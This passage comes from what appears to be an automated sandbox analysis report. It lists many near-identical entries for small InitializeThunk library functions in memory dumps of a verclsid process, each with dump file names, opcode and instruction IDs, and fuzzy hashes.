                                                                                                                                              • Opcode Fuzzy Hash: 4527b5afe9b6be1aa784b84ddcaa3ee7a0869e3bed80dd52f06b41c57205a350
                                                                                                                                              • Instruction Fuzzy Hash: 489002616419009261407158880440660059BE13453D5C115A05555A4C8618D956A26A
                                                                                                                                              Function 04EF4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: af147c11dcedf46a6eee9fa763e39c4eeaceabb74a4cadb3a1a87875443ec53d
                                                                                                                                              • Instruction ID: 988399128c0f669f611da358a6b41e2da54fddf7a4260f3b3176a3eb732d306c
                                                                                                                                              • Opcode Fuzzy Hash: af147c11dcedf46a6eee9fa763e39c4eeaceabb74a4cadb3a1a87875443ec53d
                                                                                                                                              • Instruction Fuzzy Hash: 40900231645C0062B1407158888454640059BE0345B95C011E0425598C8A14DA576362
                                                                                                                                              Function 04EF2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: c4ae9f5d7e946840aa7518c4930c6c59a549ec68dce35e7e1c80ec1a4a8d5afc
                                                                                                                                              • Instruction ID: 5e5c4dad28e70dac5a34d4770e52f07488f90ea6e2b7a26bad46b696761c9906
                                                                                                                                              • Opcode Fuzzy Hash: c4ae9f5d7e946840aa7518c4930c6c59a549ec68dce35e7e1c80ec1a4a8d5afc
                                                                                                                                              • Instruction Fuzzy Hash: 5690023124180452F1007598940864600058BE0345F95D011A5025599EC665D9927132
                                                                                                                                              Function 04EF2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 916b2e0da34269bf9ad8b5cce5e9f49ff89ddc0437c38d777c064cfbbccdc47b
                                                                                                                                              • Instruction ID: aa27e149d7653123fea9549d2a3eff3c97def3c8c010d5a892ead6d9c92b5211
                                                                                                                                              • Opcode Fuzzy Hash: 916b2e0da34269bf9ad8b5cce5e9f49ff89ddc0437c38d777c064cfbbccdc47b
                                                                                                                                              • Instruction Fuzzy Hash: F990023124180892F10071588404B4600058BE0345F95C016A0125698D8615D9527522
                                                                                                                                              Function 04EF2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 2420bbe6c18e1bccd5296910bc7184d03612ee5837d3352dd9160fbb3e62f386
                                                                                                                                              • Instruction ID: b29eb6d2b8598f7a4c5381817c7a0337b52d60963a83f3f5f4843814decbaf23
                                                                                                                                              • Opcode Fuzzy Hash: 2420bbe6c18e1bccd5296910bc7184d03612ee5837d3352dd9160fbb3e62f386
                                                                                                                                              • Instruction Fuzzy Hash: 5E90023124188852F1107158C40474A00058BD0345F99C411A442569CD8695D9927122
                                                                                                                                              Function 04EF2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: fed0060fac1714d197bf619b2342585e35d408614e758cb32da20e9fc87ec49f
                                                                                                                                              • Instruction ID: 833f07d2ec27d46e2c751d486ad8a313dc4715fbee5d20fd726ea2227c79eb70
                                                                                                                                              • Opcode Fuzzy Hash: fed0060fac1714d197bf619b2342585e35d408614e758cb32da20e9fc87ec49f
                                                                                                                                              • Instruction Fuzzy Hash: EB90023124180463F1117158850470700098BD0285FD5C412A042559CD9656DA53B122
                                                                                                                                              Function 04EF2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f16c483fb3263deae83f23893e59eac913782dc23dd038a2d241ef8c68e5b52e
                                                                                                                                              • Instruction ID: a91d13dddc444b3718829a0ec1298c6a1e68baffb3acc8c8dd2f15bf3082bf30
                                                                                                                                              • Opcode Fuzzy Hash: f16c483fb3263deae83f23893e59eac913782dc23dd038a2d241ef8c68e5b52e
                                                                                                                                              • Instruction Fuzzy Hash: 71900221282841A27545B158840450740069BE02857D5C012A1415994C8526E957E622
                                                                                                                                              Function 04EF2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: fba1e7c2ab9e48086d11f335bf0b35ac4ba1caf96e5a3c949fa5ad242fba153b
                                                                                                                                              • Instruction ID: 592b260fb9ee7d3d023c0b28fb45faf2d53df918f3053d45a75182cfb5cf0fe3
                                                                                                                                              • Opcode Fuzzy Hash: fba1e7c2ab9e48086d11f335bf0b35ac4ba1caf96e5a3c949fa5ad242fba153b
                                                                                                                                              • Instruction Fuzzy Hash: 3590022134180053F140715894186064005DBE1345F95D011E0415598CD915D9576223
                                                                                                                                              Function 04EF2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 3e464bc39e2f2821cb9247d6b6b2fd1c13442ff37d280e13fc211fb3c8b4ffd6
                                                                                                                                              • Instruction ID: 249c0f419da5b5d7afab018a727d6327e47d428990b5851c46f7e309492acf04
                                                                                                                                              • Opcode Fuzzy Hash: 3e464bc39e2f2821cb9247d6b6b2fd1c13442ff37d280e13fc211fb3c8b4ffd6
                                                                                                                                              • Instruction Fuzzy Hash: 6F90022925380052F1807158940860A00058BD1246FD5D415A001659CCC915D96A6322
                                                                                                                                              Function 04EF2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f08fb4be524f306772e9e0e0a958f3d0967a6d9258ecf80498bdcd3c7bb027df
                                                                                                                                              • Instruction ID: d28f5bb73f0bc9e5ad960aa79bcb5657031403cb3005266b8609d2027aca358b
                                                                                                                                              • Opcode Fuzzy Hash: f08fb4be524f306772e9e0e0a958f3d0967a6d9258ecf80498bdcd3c7bb027df
                                                                                                                                              • Instruction Fuzzy Hash: 8E900261241C0453F1407558880460700058BD0346F95C011A2065599E8A29DD527136
                                                                                                                                              Function 04EF2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: a33cdc82ff1302f1236be7eae70231aff7fdc5985e0c9738be4ee1b47354f134
                                                                                                                                              • Instruction ID: 0acc422a74b4ee27bed3b940cb40a92f327600edff4bd5d523d5849b54952fd7
                                                                                                                                              • Opcode Fuzzy Hash: a33cdc82ff1302f1236be7eae70231aff7fdc5985e0c9738be4ee1b47354f134
                                                                                                                                              • Instruction Fuzzy Hash: 1390022164180552F10171588404616000A8BD0285FD5C022A1025599ECA25DA93B132
                                                                                                                                              Function 04EF2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 44a902952ea711913156025c41c063c09b9f6302ff56794e1f7ee0477dd3fcb8
                                                                                                                                              • Instruction ID: 27d5dee5dafa511f28399da611b0a9da5ac5ab914384292b33e7efd74bd29512
                                                                                                                                              • Opcode Fuzzy Hash: 44a902952ea711913156025c41c063c09b9f6302ff56794e1f7ee0477dd3fcb8
                                                                                                                                              • Instruction Fuzzy Hash: 6F900221251C0092F20075688C14B0700058BD0347F95C115A0155598CC915D9626522
                                                                                                                                              Function 04EF2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 5aac0da0246d4298b1c5e95173c4ee4f9193c37f246f147a7db4b7c06d001a48
                                                                                                                                              • Instruction ID: 54320afc3f910acfe5094fd09803cd8f5066c69913c1db726ab2b88108a1617b
                                                                                                                                              • Opcode Fuzzy Hash: 5aac0da0246d4298b1c5e95173c4ee4f9193c37f246f147a7db4b7c06d001a48
                                                                                                                                              • Instruction Fuzzy Hash: BF9002216418009261407168C8449064005AFE1255795C121A0999594D8559D9666666
                                                                                                                                              Function 04EF2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: d1954f4846b022d6d88570aeb205de7f70efe8a715a1d6222a4c2142bbd67623
                                                                                                                                              • Instruction ID: 448756ae67608563b0d0100da3912ef5b1c4b19e39455b0c6b4835787b5eb0da
                                                                                                                                              • Opcode Fuzzy Hash: d1954f4846b022d6d88570aeb205de7f70efe8a715a1d6222a4c2142bbd67623
                                                                                                                                              • Instruction Fuzzy Hash: F090026138180492F10071588414B060005CBE1345F95C015E1065598D8619DD537127
                                                                                                                                              Function 04EF2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f0362cb635fa79034a4f78ecf272b83d3765b0c9850ea202a394aa4895237e72
                                                                                                                                              • Instruction ID: 38a38f5173c064558fc3fe6b2fe9674807bee7d33a8014a387c9384e8e37ac79
                                                                                                                                              • Opcode Fuzzy Hash: f0362cb635fa79034a4f78ecf272b83d3765b0c9850ea202a394aa4895237e72
                                                                                                                                              • Instruction Fuzzy Hash: 7E900225261800522145B558460450B04459BD63953D5C015F14175D4CC621D9666322
                                                                                                                                              Function 04EF2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: e7b5f0428d1052d8b6cefda5d0e4b81aaf58161cb494b1b95c4aa44b89da6f12
                                                                                                                                              • Instruction ID: f3b3b3f0a89bd7c1a0e8b7dc776fb2bc414b4d81b8a94e3fa3401bfedb11508c
                                                                                                                                              • Opcode Fuzzy Hash: e7b5f0428d1052d8b6cefda5d0e4b81aaf58161cb494b1b95c4aa44b89da6f12
                                                                                                                                              • Instruction Fuzzy Hash: 85900225251800532105B558470450700468BD5395395C021F1016594CD621D9626122
                                                                                                                                              Function 04EF2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: f58c993a25ee895f8c0a1387d15b97c04dceaeecbc192c06e43d1336c59a1407
                                                                                                                                              • Instruction ID: b03bfd9e86e5bfe7dfba64d56da8f503a2e047dcb2139696203c995d2755f348
                                                                                                                                              • Opcode Fuzzy Hash: f58c993a25ee895f8c0a1387d15b97c04dceaeecbc192c06e43d1336c59a1407
                                                                                                                                              • Instruction Fuzzy Hash: 4190023124584892F14071588404A4600158BD0349F95C011A00656D8D9625DE56B662
                                                                                                                                              Function 04EF2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 938d1293c65a610a701389a100b2662846aa2e9244019b871756d5feb1d20173
                                                                                                                                              • Instruction ID: d4cb0bdfe5c36bf34173becb896a529bb12ae0887b1dff55958d33097363a000
                                                                                                                                              • Opcode Fuzzy Hash: 938d1293c65a610a701389a100b2662846aa2e9244019b871756d5feb1d20173
                                                                                                                                              • Instruction Fuzzy Hash: EC90023124180852F1807158840464A00058BD1345FD5C015A0026698DCA15DB5A77A2
                                                                                                                                              Function 04EF2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: fdffaa3922706c30d61137a57f2991ee0da57c0cd9e23c1045dc090ef3e5a787
                                                                                                                                              • Instruction ID: e5bb39d46fffa98fefd806c9b16e199b07c053f10b6943221157c3a205ab5c92
                                                                                                                                              • Opcode Fuzzy Hash: fdffaa3922706c30d61137a57f2991ee0da57c0cd9e23c1045dc090ef3e5a787
                                                                                                                                              • Instruction Fuzzy Hash: B890023164580852F1507158841474600058BD0345F95C011A0025698D8755DB5676A2
                                                                                                                                              Function 04EF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 840abc14107b609a8484fcb6ffab2b7ce0ab99db4c501ffef86c5b7f2971b733
                                                                                                                                              • Instruction ID: 1c09a2658517acec47cd8ea1bca782c24af2618f072a4cd359489179cd0eef4a
                                                                                                                                              • Opcode Fuzzy Hash: 840abc14107b609a8484fcb6ffab2b7ce0ab99db4c501ffef86c5b7f2971b733
                                                                                                                                              • Instruction Fuzzy Hash: 3490026124280053610571588414616400A8BE0245B95C021E10155D4DC525D9927126
                                                                                                                                              Function 04EF35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
